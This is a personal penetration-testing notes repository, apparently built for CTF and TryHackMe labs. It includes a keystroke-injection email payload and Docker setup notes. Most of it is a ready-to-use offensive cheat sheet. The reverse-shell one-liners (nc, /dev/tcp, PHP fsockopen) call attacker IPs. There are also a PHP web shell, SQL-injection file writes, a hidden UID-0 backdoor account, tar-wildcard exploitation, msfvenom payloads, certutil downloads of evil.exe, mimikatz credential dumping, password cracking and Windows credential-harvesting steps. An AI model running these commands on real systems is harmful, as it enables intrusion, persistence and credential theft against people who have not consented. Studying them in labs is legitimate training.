├── .gitignore ├── CHOCOBLAST.md ├── Deploy_Office_for_tests.md ├── Docker compose on Debian 11 ARM.md ├── HACK.md ├── Kali_Live_Tips.md ├── WindowsCS.md ├── WindowsPrivesc.md ├── alpine-mirrors.md ├── dnsmasq.md ├── docker.md ├── images ├── 006115497113a0a4f03008028dc32fb7.png ├── 06c05c134e4922ec8ff8d9b56382c58f.png ├── 1401bc3dcb1e4eb84f526b95567a5ef8.png ├── 24545e313a2e5ddee2386a68b4c7adeb.png ├── 33303d0cde736589d2838ee894379ff2.png ├── 4603506a36f4bbda602dc67cdc845d9f.png ├── a5437a609e41d982b320967667e9b97a.png ├── bbd0af143c9a9b31c1acce32fabfdc0f.png ├── befb434f15dbd4deee0654f8b6ef6de0.png ├── c25de66ae7777169d09a61ce2fb38e28.png ├── d8244cfd9d64a7be30f5fb0308fd0806.png ├── dd7290ca93369cee33182023cb9190ff.png ├── dnsmasq.gif ├── ff706d6530426d3123c0983acd61f934.png ├── pwncat.gif ├── ssti.png ├── terminator_shortcuts.png └── vpnchoice.gif ├── import_ova_to_pve.md ├── install.md ├── ligolo.md ├── osint.txt └── pwncat-cs.md /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | *.html 3 | .DS_Store 4 | .vscode -------------------------------------------------------------------------------- /CHOCOBLAST.md: -------------------------------------------------------------------------------- 1 | # CHOCOBLAST 2 | 3 | ## MALDUINO (outlook) 4 | 5 | ```powershell 6 | REM CHOCOBLAST 7 | LOCALE FR 8 | DELAY 1000 9 | GUI r 10 | STRING powershell 11 | DELAY 1000 12 | ENTER 13 | DELAY 2000 14 | STRING outlook = new-object -comobject outlook.application 15 | ENTER 16 | STRING $email = $outlook.CreateItem(0) 17 | ENTER 18 | STRING $email.To = "MAIL1;MAIL2" 19 | ENTER 20 | STRING $email.Subject = "New email test" 21 | ENTER 22 | STRING $email.Body = "This is a testing email" 23 | ENTER 24 | STRING $email.Send() 25 | ENTER 26 | STRING $outlook.Quit() 27 | ENTER 28 | STRING [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Outlook) | Out-Null 29 | ENTER 30 | STRING exit 31 | ENTER 32 | ``` 33 | 34 | ## WHID (gmail) 35 | 36 | ```bash 37 | Print:MAIL1;MAIL2 38 | Press:179 39 | Print:Choco 40 | Press:179 41 | Print:J'apporte les chocos la prochaine fois 42 | Press:179 43 | Press:32 44 | ``` 45 | -------------------------------------------------------------------------------- /Deploy_Office_for_tests.md: -------------------------------------------------------------------------------- 1 | # Deploy Office for tests 2 | 3 | - Download Office Deployment Tools: 4 | 5 | https://www.microsoft.com/en-us/download/details.aspx?id=49117 6 | 7 | - Launch it to extract file where you want 8 | - Open a cmd where files are located and launch: 9 | ```cmd 10 | setup.exe /configure configuration-Office2021Enterprise.xml 11 | ``` -------------------------------------------------------------------------------- /Docker compose on Debian 11 ARM.md: -------------------------------------------------------------------------------- 1 | # Docker compose on Debian 11 ARM 2 | 3 | ## DOCKER 4 | 5 | ```bash 6 | sudo apt-get remove docker docker-engine docker.io containerd runc 7 | sudo apt-get update 8 | sudo apt-get install ca-certificates curl gnupg lsb-release 9 | curl -fsSL https://download.docker.com/linux/debian/gpg | sudo gpg --dearmor -o /usr/share/keyrings/docker-archive-keyring.gpg 10 | echo "deb [arch=$(dpkg --print-architecture) signed-by=/usr/share/keyrings/docker-archive-keyring.gpg] https://download.docker.com/linux/debian $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null 11 | sudo apt-get update 12 | sudo apt-get install docker-ce docker-ce-cli containerd.io 13 | ``` 14 | 15 | ## PIP3 16 | 17 | ```bash 18 | sudo apt update 19 | sudo apt -y upgrade 20 | sudo apt update 21 | sudo apt install python3-venv python3-pip 22 | ``` 23 | 24 | ## DOCKER-COMPOSE 25 | 26 | ```bash 27 | pip3 install docker-compose 28 | ``` 29 | 30 | ## WORDPRESS 31 | 32 | ```bash 33 | mkdir my_wordpress 34 | cd my_wordpress 35 | ``` 36 | 37 | ### docker-compose.yml 38 | 39 | ```yml 40 | version: "3.9" 41 | 42 | services: 43 | db: 44 | image: mariadb:latest 45 | volumes: 46 | - db_data:/var/lib/mysql 47 | restart: always 48 | environment: 49 | MYSQL_ROOT_PASSWORD: my_root_password 50 | MYSQL_DATABASE: wordpress 51 | MYSQL_USER: wordpress 52 | MYSQL_PASSWORD: my_wordpress_password 53 | 54 | wordpress: 55 | depends_on: 56 | - db 57 | image: wordpress:latest 58 | volumes: 59 | - wordpress_data:/var/www/html 60 | ports: 61 | - "8000:80" 62 | restart: always 63 | environment: 64 | WORDPRESS_DB_HOST: db 65 | WORDPRESS_DB_USER: wordpress 66 | WORDPRESS_DB_PASSWORD: wordpress 67 | WORDPRESS_DB_NAME: my_wordpress_password 68 | volumes: 69 | db_data: {} 70 | wordpress_data: {} 71 | ``` 72 | 73 | ## LAUNCH 74 | 75 | ```bash 76 | docker-compose up -d 77 | ``` 78 | 79 | ## DELETE 80 | 81 | ```bash 82 | docker-compose down --volumes 83 | ``` 84 | 85 | ## MYSQL / MARIADB 86 | 87 | On ARM, using MySQL in docker-compose.yml (`image: mysql:latest`) results in the following error: 88 | `ERROR: no matching manifest for linux/arm64/v8 in the manifest list entries` 89 | This is because there is no arm64 version of MySQL. 90 | Instead, use mariadb: `image: mariadb:latest` -------------------------------------------------------------------------------- /HACK.md: -------------------------------------------------------------------------------- 1 | # HACK NOTES 2 | 3 | - [HACK NOTES](#hack-notes) 4 | - [Scan](#scan) 5 | - [Port Scanning](#port-scanning) 6 | - [FTP Port 21](#ftp-port-21) 7 | - [SNMP Port 161](#snmp-port-161) 8 | - [Web Port 80, 443](#web-port-80-443) 9 | - [FeroxBuster](#feroxbuster) 10 | - [MySQL Port 3306 \& MsSQL Port 1433](#mysql-port-3306--mssql-port-1433) 11 | - [SMB Port 445,139 \& RPC Port 111,135](#smb-port-445139--rpc-port-111135) 12 | - [DNS](#dns) 13 | - [SQL Injection](#sql-injection) 14 | - [SHELL](#shell) 15 | - [Stable Shell](#stable-shell) 16 | - [Reverse shell](#reverse-shell) 17 | - [Shell from SQL injection](#shell-from-sql-injection) 18 | - [python Spawn shell](#python-spawn-shell) 19 | - [Post Exploitation](#post-exploitation) 20 | - [Words list generator](#words-list-generator) 21 | - [Hash](#hash) 22 | - [PrivEsc](#privesc) 23 | - [GTFOBin](#gtfobin) 24 | - [sudo -l](#sudo--l) 25 | - [EUID 0 to UID 0](#euid-0-to-uid-0) 26 | - [LinPeas](#linpeas) 27 | - [Enum](#enum) 28 | - [List SUID files](#list-suid-files) 29 | - [List capabilities files](#list-capabilities-files) 30 | - [List writable folders](#list-writable-folders) 31 | - [List of executable binaries](#list-of-executable-binaries) 32 | - [Netcat](#netcat) 33 | - [SSH](#ssh) 34 | - [Password Hack](#password-hack) 35 | - [Hydra](#hydra) 36 | - [JohnTheRipper](#johntheripper) 37 | - [Hashcat](#hashcat) 38 | - [Steganography](#steganography) 39 | - [SQLMAP](#sqlmap) 40 | - [pwncat](#pwncat) 41 | - [track modifications](#track-modifications) 42 | - [Wifite](#wifite) 43 | - [wpscan](#wpscan) 44 | - [Meterpreter Windows PrivEsc](#meterpreter-windows-privesc) 45 | - [GetSystem](#getsystem) 46 | - [Meterpreter shell](#meterpreter-shell) 47 | - [Generate tcp reverse shell](#generate-tcp-reverse-shell) 48 | - [MSFConsol one line listener](#msfconsol-one-line-listener) 49 | - [Suggester](#suggester) 50 | - [LFI](#lfi) 51 | - [Fuzz](#fuzz) 52 | - [View php code](#view-php-code) 53 | - [View access.log](#view-accesslog) 54 | - [Command injection](#command-injection) 55 | - [SSTI](#ssti) 56 | - [XML external entity (XXE) injection](#xml-external-entity-xxe-injection) 57 | - [PING](#ping) 58 | - [TAR Wildcards](#tar-wildcards) 59 | - [XAuthority / X11 dump](#xauthority--x11-dump) 60 | - [CSRF / XSS](#csrf--xss) 61 | - [Websites](#websites) 62 | 63 | ## Scan 64 | 65 | ### Port Scanning 66 | 67 | ```sh 68 | nmap -sC -sV -oN nmap/initial $IP 69 | nmap -sC -sV -p- -oN nmap/all_ports $IP 70 | nmap -Pn -sT -sU -p $ports --script=*vuln* -vv -oN nmap/vuln $IP 71 | ``` 72 | 73 | ### FTP Port 21 74 | 75 | ```sh 76 | nmap -p 21 --script="+*ftp* and not brute and not dos and not fuzzer" -vv -oN nmap/ftp $IP 77 | hydra -s 21 -C /usr/share/.../passwords -u -f $IP ftp 78 | ``` 79 | 80 | ### SNMP Port 161 81 | 82 | ```sh 83 | snmpwalk -c public -v1 $IP 84 | snmp-check $IP 85 | snmpcheck -t $IP -c public 86 | ``` 87 | 88 | ### Web Port 80, 443 89 | 90 | ```sh 91 | nikto -h http://$IP/ 92 | gobuster dir -e -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/common.txt 93 | gobuster dir -e -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x ext,ext2,ext3 94 | wfuzz --hc 404 -c -w /usr/share/seclists/Discovery/Web-Content/common.txt http://$IP/FUZZ.txt 95 | wfuzz -c --hc 403 -u http://paper -H "Host: FUZZ.paper" -w /usr/share/wfuzz/wordlist/general/common.txt 96 | wfuzz -u http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/FUZZ/cmdline -z range,1-1000 --hw 1 97 | ffuf -fc 403 -w /usr/share/wfuzz/wordlist/general/common.txt -u http://paper/ -H "Host: FUZZ.paper" 98 | gobuster vhost -u http://test.com -w dnslist.txt --append-domain 99 | ``` 100 | 101 | #### FeroxBuster 102 | 103 | ```sh 104 | sudo apt update && sudo apt install -y feroxbuster 105 | 106 | feroxbuster -e -d0 --url url 107 | ``` 108 | 109 | ### MySQL Port 3306 & MsSQL Port 1433 110 | 111 | ```sh 112 | nmap -p 3306 --script="+*mysql* and not brute and not dos and not fuzzer" -vv -oN nmap/mysql $IP 113 | ``` 114 | 115 | ### SMB Port 445,139 & RPC Port 111,135 116 | 117 | ```sh 118 | enum4linux -a $IP 119 | nmap -p 139,445 192.168.1.1/24 --script smb-enum-shares.nse smb-os-discovery.nse 120 | nmap --script "smb-vuln*" -p 445 10.129.227.181 121 | nmap --script rpcinfo.nse $IP -p 111 122 | rpcclient -U "" -N 123 | smbclient -L $IP 124 | smbclient \\\\hack.thm\\websvr 125 | showmount -e $IP 126 | smbmap -H hack.thm -R 127 | smbmap -H $IP -d -u -p 128 | mount -t cifs //$IP/ -o username="guest", password="" 129 | ``` 130 | 131 | ### DNS 132 | 133 | ```sh 134 | dig @10.129.227.180 -x 10.129.227.180 135 | dig @10.129.227.180 trick.htb any 136 | dig @10.129.227.180 trick.htb axfr 137 | ``` 138 | 139 | ## SQL Injection 140 | 141 | `OR 1=1` can be dangerous if an UPDATE/DELETE is done after the SELECT 142 | 143 | Prefer using (you have to know the username) 144 | - admin'; -- - 145 | - admin' AND '1'='1 146 | 147 | That way, SELECT will return only one row 148 | 149 | https://book.hacktricks.xyz/pentesting-web/sql-injection 150 | 151 | ## SHELL 152 | 153 | ### Stable Shell 154 | 155 | ```sh 156 | python -c 'import pty;pty.spawn("/bin/bash")' 157 | OR 158 | python3 -c 'import pty;pty.spawn("/bin/bash")' 159 | 160 | export TERM=xterm 161 | CTRL+Z 162 | stty raw -echo; fg 163 | [2xENTER] 164 | ``` 165 | 166 | ```sh 167 | alias ll='ls -lah --color' 168 | ``` 169 | 170 | ### Reverse shell 171 | 172 | ```sh 173 | rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.9.129.247 1234 >/tmp/f 174 | ``` 175 | 176 | ```sh 177 | /bin/bash -c '/bin/bash -i >& /dev/tcp/10.9.129.247/1234 0>&1' 178 | ``` 179 | 180 | ```sh 181 | nc -nv 10.11.55.28 1234 -e /bin/bash 182 | ``` 183 | 184 | ### Shell from SQL injection 185 | 186 | - Windows 187 | 188 | ```sql 189 | ?id=1 union all select 1,2,3,4,"""",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php' 190 | ``` 191 | 192 | - Linux 193 | 194 | ```sql 195 | ?id=1 union all select 1,2,3,4,"""",6,7,8,9 into OUTFILE '/var/www/html/cmd.php' 196 | ``` 197 | 198 | ### python Spawn shell 199 | 200 | ```python 201 | import pty; pty.spawn("/bin/sh") 202 | ``` 203 | 204 | ## Post Exploitation 205 | 206 | ```sh 207 | unshadow passwd.txt shadow.txt > passwords.txt 208 | sudo useradd -ou 0 -g 0 john | sudo passwd John@1234 209 | ``` 210 | 211 | ```sh 212 | Attacker side: 213 | nc -l -p 4444 -q 1 > file < /dev/null 214 | 215 | Victim side: 216 | nc 4444 < file 217 | ``` 218 | 219 | ```sh 220 | python -m http.server 221 | python -m SimpleHTTPServer 222 | ``` 223 | 224 | ## Words list generator 225 | 226 | ```sh 227 | cewl -w wordslist.txt -d 10 http://$IP 228 | ``` 229 | 230 | ## Hash 231 | 232 | - hash-identifier 233 | - hashid 234 | 235 | ## PrivEsc 236 | 237 | ### GTFOBin 238 | 239 | 240 | 241 | ### sudo -l 242 | 243 | - (ALL, !root) /bin/bash 244 | 245 | ```sh 246 | sudo -u#-1 /bin/bash 247 | ``` 248 | 249 | ### EUID 0 to UID 0 250 | 251 | ```bash 252 | perl -MEnglish -e '$UID = 0; $ENV{PATH} = "/bin:/usr/bin:/sbin:/usr/sbin"; exec "su - root"' 253 | ``` 254 | 255 | ### LinPeas 256 | 257 | 258 | 259 | ## Enum 260 | 261 | ### List SUID files 262 | 263 | ```sh 264 | find / -perm /4000 2>/dev/null 265 | ``` 266 | 267 | ### List capabilities files 268 | 269 | ```sh 270 | getcap -r / 2>/dev/null 271 | ``` 272 | 273 | ### List writable folders 274 | 275 | ```sh 276 | find / -type d -writable 2> /dev/null 277 | ``` 278 | 279 | ### List of executable binaries 280 | 281 | ```sh 282 | find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 6 -exec ls -ld {} \; 2>/dev/null 283 | ``` 284 | 285 | ### Netcat 286 | 287 | ```sh 288 | netcat -l 289 | ``` 290 | 291 | If 127.0.0.1:6666 292 | 293 | - On attacker 294 | 295 | ```sh 296 | apt-get install chisel 297 | # Copy chisel to victim 298 | chisel server --reverse --port 9002 299 | ``` 300 | 301 | - On victim 302 | 303 | ```sh 304 | ./chisel client 10.9.129.247:9002 R:9001:127.0.0.1:6666 305 | ``` 306 | 307 | - On attacker, go to `localhost:9001` 308 | 309 | ## SSH 310 | 311 | * -L: Direct Redirect 312 | * -D: SOCKS Redirect 313 | * -N: Do not connect 314 | 315 | Redirect localhost to victim host 316 | ```bash 317 | ssh -N -L 8080:hack.thm:8080 localhost 318 | ``` 319 | 320 | ## Password Hack 321 | 322 | ### Hydra 323 | 324 | ```sh 325 | hydra -f -t 4 -l user -P /usr/share/wordlists/rockyou.txt ssh://$IP 326 | ``` 327 | 328 | ```sh 329 | hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP http-post-form "/admin/:user=^USER^&pass=^PASS^:Username or password invalid" 330 | ``` 331 | 332 | ### JohnTheRipper 333 | 334 | - ssh private key 335 | 336 | ```sh 337 | /usr/share/john/ssh2john.py [ssh_file] > forjohn 338 | john --wordlist=wordlist.txt forjohn 339 | ``` 340 | 341 | ### Hashcat 342 | 343 | - MD5 Wordlist 344 | 345 | ```sh 346 | hashcat -a 0 -m 0 "42f749ade7f9e195bf475f37a44cafcb" /usr/share/wordlists/rockyou.txt 347 | ``` 348 | 349 | - MD5 bruteforce 350 | 351 | ```sh 352 | hashcat -a 3 -m 0 "48bb6e862e54f2a795ffc4e541caed4d" ?a?a?a?a --show 353 | ``` 354 | 355 | ## Steganography 356 | 357 | ```sh 358 | steghide extract -sf file.jpg 359 | ``` 360 | 361 | ```sh 362 | stegcracker file.jpg 363 | ``` 364 | 365 | ```sh 366 | binwalk file 367 | binwalk -e file 368 | ``` 369 | 370 | ## SQLMAP 371 | 372 | 373 | 374 | ```sh 375 | sqlmap.py -u "http://www.truc.com/index.php" --form 376 | sqlmap.py -u "http://www.truc.com/index.php" --data "[post data]" 377 | sqlmap.py -u "http://www.truc.com/index.php" --data "[post data]" --dump 378 | ``` 379 | 380 | ```sh 381 | sqlmap --url http://www.truc.com/index.php?dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=dqsqdqsdfzefv' --dbs 382 | sqlmap --url http://www.truc.com/index.php?dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=dqsqdqsdfzefv' --tables -D dvwa 383 | sqlmap --url http://www.truc.com/index.php?dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=dqsqdqsdfzefv' --columns -D dvwa -T users 384 | sqlmap --url http://www.truc.com/index.php?dvwa/vulnerabilities/sqli/?id=1\&Submit=Submit# --cookie='security=low; PHPSESSID=dqsqdqsdfzefv' --dump -D dvwa -T users 385 | ``` 386 | 387 | ```sh 388 | sqlmap -r req.txt --risk 3 --level 5 --technique=BEU --batch --privileges 389 | sqlmap -r req.txt --risk 3 --level 5 --technique=BEU --batch --privileges --file-read=/etc/passwd 390 | ``` 391 | 392 | ```sh 393 | --form 394 | --form --dbs 395 | --form --tables -D [database] 396 | --form --columns -D [database] -T [table] 397 | --form --dump -D [database] -T [table] --fresh-queries 398 | ``` 399 | 400 | ## pwncat 401 | 402 | ```sh 403 | python3 -m venv pwncat-env 404 | source pwncat-env/bin/activate 405 | pip install pwncat-cs 406 | ``` 407 | 408 | ```sh 409 | pwncat-cs 410 | listen -m linux 1234 411 | sessions 412 | sessions 0 413 | ctrl+d 414 | ``` 415 | 416 | ### track modifications 417 | 418 | ```sh 419 | tamper 420 | tamper --revert --all 421 | 422 | source env/bin/activate 423 | pwncat user@IP 424 | run enumerate.gather 425 | run escalate.auto 426 | run escalate.auto exec 427 | ``` 428 | 429 | ## Wifite 430 | 431 | ```sh 432 | sudo wifite --wpa --dict file.txt --kill 433 | ``` 434 | 435 | ## wpscan 436 | 437 | ```sh 438 | wpscan --url $IP/wordpress -e at 439 | wpscan --url $IP/wordpress -e ap 440 | wpscan --url $IP/wordpress -e u 441 | wpscan --url $IP/wordpress --enumerate 442 | wpscan --url $IP/wordpress -U users.txt -P /usr/share/wordlists/rockyou.txt 443 | ``` 444 | 445 | ## Meterpreter Windows PrivEsc 446 | 447 | ### GetSystem 448 | 449 | ```sh 450 | use priv 451 | getsystem 452 | getuid 453 | ``` 454 | 455 | ### Meterpreter shell 456 | 457 | ```sh 458 | ^Z 459 | search shell_to_meterpreter 460 | use 0 461 | options 462 | set SESSION 1 463 | run 464 | sessions 465 | sessions -i 2 466 | ``` 467 | 468 | ### Generate tcp reverse shell 469 | 470 | ```bash 471 | msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT="1234" -f exe -o rev.exe 472 | ``` 473 | 474 | ### MSFConsol one line listener 475 | 476 | ```bash 477 | sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT '1234'; exploit" 478 | ``` 479 | 480 | ### Suggester 481 | 482 | post/multi/recon/local_exploit_suggester 483 | 484 | ## LFI 485 | 486 | ### Fuzz 487 | 488 | ```sh 489 | wfuzz --hw 0 -c -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt http://$IP/page=../../../../../../../../..FUZZ 490 | ``` 491 | 492 | ### View php code 493 | 494 | ```sh 495 | =php://filter/convert.base64-encode/resource=page.php 496 | ``` 497 | 498 | ### View access.log 499 | 500 | ```sh 501 | =/var/www/html/development_testing/../../../../var/log/apache2/access.log 502 | ``` 503 | 504 | ### Command injection 505 | 506 | - Capture the request in BurpSuite and then send it to Repeater Tab 507 | - Reload page with the User-Agent replaced with this php code: `` 508 | - Modifiy the get request 509 | 510 | ```sh 511 | GET /test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log&cmd=whoami HTTP/1.1 512 | ``` 513 | 514 | - Use the following reverse shell in cmd= (ctrl+u to encode it) 515 | 516 | ```sh 517 | php -r '$sock=fsockopen("10.9.129.247",1234);exec("/bin/sh -i <&3 >&3 2>&3"); 518 | ``` 519 | 520 | - Oneline backdoor 521 | 522 | ```php 523 | "; $cmd = ($_REQUEST['cmd']); system($cmd); echo ""; die; }?> 524 | ``` 525 | 526 | ## SSTI 527 | 528 | Server-Side Template Injection 529 | ![SSTI](images/ssti.png) 530 | 531 | ## XML external entity (XXE) injection 532 | 533 | ```xml 534 | 535 | ]> 536 | &xxe; 537 | ``` 538 | 539 | ## PING 540 | 541 | On Kali 542 | ```bash 543 | sudo tcpdump -i tun0 icmp 544 | ``` 545 | 546 | On victim 547 | ```bash 548 | ping -c 2 kali_ip 549 | ``` 550 | 551 | ## TAR Wildcards 552 | 553 | In case of CRON like 554 | `*/1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*` 555 | 556 | Payload generation 557 | ```sh 558 | msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.10 lport=8888 R 559 | ``` 560 | 561 | ```sh 562 | echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh 563 | echo "" > "--checkpoint-action=exec=sh shell.sh" 564 | echo "" > --checkpoint=1 565 | ``` 566 | 567 | ## XAuthority / X11 dump 568 | 569 | If you have access to the .Xauthority from another user 570 | 571 | - Set it for your current user 572 | 573 | ```bash 574 | XAUTHORITY=/tmp/.Xauthority 575 | export XAUTHORITY 576 | xauth list 577 | ``` 578 | 579 | - Check who is connected 580 | 581 | ```bash 582 | w 583 | 584 | USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT 585 | ross tty7 :0 Fri06 2days 5:38 0.14s /usr/libexec/gnome-session-binary --systemd --session=gnome 586 | ``` 587 | 588 | - Dump his screen 589 | 590 | ```bash 591 | xwd -root -screen -silent -display :0 -out dump 592 | ``` 593 | 594 | ```bash 595 | -display display 596 | This argument allows you to specify the server to connect to; see x(7). 597 | -out file 598 | This argument allows the user to explicitly specify the output file on the command line. The default is to output to standard out. 599 | -root 600 | This option indicates that the root window should be selected for the window dump, without requiring the user to select a window with the pointer. 601 | -screen 602 | This option indicates that the GetImage request used to obtain the image should be done on the root window, rather than directly on the specified window. In this way, you can obtain pieces of other windows that overlap the specified window, and more importantly, you can capture menus or other popups that are independent windows but appear over the specified window. 603 | -silent 604 | Operate silently, i.e. don't ring any bells before and after dumping the window. 605 | ``` 606 | 607 | - Open the dump 608 | 609 | ```bash 610 | xwud -in dump 611 | ``` 612 | 613 | ## CSRF / XSS 614 | 615 | Exemple 1 616 | 617 | ```html 618 | 619 | 620 |
621 | 622 | 623 | 624 |
625 | 629 | 630 | 631 | ``` 632 | 633 | Exemple 2 634 | 635 | ```html 636 |
637 | 638 | 639 | 640 | 641 |
642 | 643 | 659 | ``` 660 | 661 | ## Websites 662 | 663 | - 664 | - 665 | - 666 | - 667 | - 668 | - 669 | - 670 | - 671 | - 672 | -------------------------------------------------------------------------------- /Kali_Live_Tips.md: -------------------------------------------------------------------------------- 1 | # TIPS FOR KALI LIVE 2 | 3 | ## Reset Windows password 4 | 5 | ```bash 6 | /Windows/System32/Config 7 | chntpw -l SAM 8 | chntpw -u username SAM 9 | ``` 10 | -------------------------------------------------------------------------------- /WindowsCS.md: -------------------------------------------------------------------------------- 1 | # Windows Cheat Sheet 2 | 3 | - [Windows Cheat Sheet](#windows-cheat-sheet) 4 | - [Generate a revshell](#generate-a-revshell) 5 | - [Upload a file](#upload-a-file) 6 | - [Add color to winPEAS](#add-color-to-winpeas) 7 | - [MIMIKATZ](#mimikatz) 8 | - [Commands](#commands) 9 | - [Unquoted Service Path](#unquoted-service-path) 10 | 11 | ## Generate a revshell 12 | ```bash 13 | msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.66.218 LPORT=1234 -f exe -o exp.exe 14 | ``` 15 | 16 | ## Upload a file 17 | ```bash 18 | certutil.exe -urlcache -split -f http://10.11.66.218:9999/evil.exe C:\\Temp\\evil.exe 19 | ``` 20 | 21 | ## Add color to winPEAS 22 | ```bash 23 | REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1 24 | ``` 25 | 26 | ## MIMIKATZ 27 | Upload `mimikatz` 28 | 29 | ### Commands 30 | ``` 31 | privilege::debug 32 | lsadump::sam 33 | ``` 34 | 35 | ## Unquoted Service Path 36 | - Scan vuln services 37 | ```bash 38 | wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ 39 | ``` 40 | 41 | - Check permissions 42 | ```bash 43 | icacls "C:\Program Files\Development Files" 44 | ``` 45 | 46 | - Create a payload 47 | ```bash 48 | msfvenom -p windows/exec CMD="net localgroup administrators sage /add" -f exe-service -o Devservice.exe 49 | ``` 50 | ```bash 51 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.66.218 LPORT=1234 -f exe-service -o Devservice.exe 52 | ``` 53 | 54 | - Get service info 55 | ```bash 56 | sc qc "Development Service" 57 | ``` -------------------------------------------------------------------------------- /WindowsPrivesc.md: -------------------------------------------------------------------------------- 1 | # Windows Privesc 2 | From Tryhackme Linux Privesc Lab 3 | 4 | - [Windows Privesc](#windows-privesc) 5 | - [Harvesting Passwords from Usual Spots](#harvesting-passwords-from-usual-spots) 6 | - [Unattended Windows Installations](#unattended-windows-installations) 7 | - [Powershell History](#powershell-history) 8 | - [Saved Windows Credentials](#saved-windows-credentials) 9 | - [IIS Configuration](#iis-configuration) 10 | - [Retrieve Credentials from Software: PuTTY](#retrieve-credentials-from-software-putty) 11 | - [Other Quick Wins](#other-quick-wins) 12 | - [AlwaysInstallElevated](#alwaysinstallelevated) 13 | - [Abusing Service Misconfigurations](#abusing-service-misconfigurations) 14 | - [Windows Services](#windows-services) 15 | - [Insecure Permissions on Service Executable](#insecure-permissions-on-service-executable) 16 | - [Unquoted Service Paths](#unquoted-service-paths) 17 | - [Insecure Service Permissions](#insecure-service-permissions) 18 | - [Abusing dangerous privileges](#abusing-dangerous-privileges) 19 | - [Windows Privileges](#windows-privileges) 20 | - [SeBackup / SeRestore](#sebackup--serestore) 21 | - [SeImpersonate / SeAssignPrimaryToken](#seimpersonate--seassignprimarytoken) 22 | - [Abusing vulnerable software](#abusing-vulnerable-software) 23 | - [Unpatched Software](#unpatched-software) 24 | - [Case Study: Druva inSync 6.6.3](#case-study-druva-insync-663) 25 | - [Tools of the Trade](#tools-of-the-trade) 26 | - [WinPEAS](#winpeas) 27 | - [PrivescCheck](#privesccheck) 28 | - [WES-NG: Windows Exploit Suggester - Next Generation](#wes-ng-windows-exploit-suggester---next-generation) 29 | - [Metasploit](#metasploit) 30 | 31 | # Harvesting Passwords from Usual Spots 32 | The easiest way to gain access to another user is to gather credentials from a compromised machine. Such credentials could exist for many reasons, including a careless user leaving them around in plaintext files; or even stored by some software like browsers or email clients. 33 | 34 | 35 | ## Unattended Windows Installations 36 | 37 | When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don't require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations: 38 | 39 | - C:\Unattend.xml 40 | - C:\Windows\Panther\Unattend.xml 41 | - C:\Windows\Panther\Unattend\Unattend.xml 42 | - C:\Windows\system32\sysprep.inf 43 | - C:\Windows\system32\sysprep\sysprep.xml 44 | 45 | As part of these files, you might encounter credentials: 46 | 47 | ``` 48 | 49 | Administrator 50 | thm.local 51 | MyPassword123 52 | 53 | ``` 54 | 55 | ## Powershell History 56 | 57 | Whenever a user runs a command using Powershell, it gets stored into a file that keeps a memory of past commands. This is useful for repeating commands you have used before quickly. If a user runs a command that includes a password directly as part of the Powershell command line, it can later be retrieved by using the following command from a `cmd.exe` prompt: 58 | 59 | ``` 60 | type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 61 | ``` 62 | 63 | Note: The command above will only work from cmd.exe, as Powershell won't recognize `%userprofile%` as an environment variable. To read the file from Powershell, you'd have to replace `%userprofile%` with `$Env:userprofile`. 64 | 65 | ## Saved Windows Credentials 66 | 67 | Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials: 68 | 69 | ``` 70 | cmdkey /list 71 | ``` 72 | 73 | While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with the `runas` command and the `/savecred` option, as seen below. 74 | 75 | ``` 76 | runas /savecred /user:admin cmd.exe 77 | ``` 78 | 79 | ## IIS Configuration 80 | 81 | Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called `web.config`and can store passwords for databases or configured authentication mechanisms. Depending on the installed version of IIS, we can find web.config in one of the following locations: 82 | 83 | - C:\inetpub\wwwroot\web.config 84 | - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config 85 | 86 | Here is a quick way to find database connection strings on the file: 87 | 88 | ``` 89 | type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString 90 | ``` 91 | 92 | ## Retrieve Credentials from Software: PuTTY 93 | 94 | PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection's parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials. 95 | 96 | To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command: 97 | 98 | ``` 99 | reg query 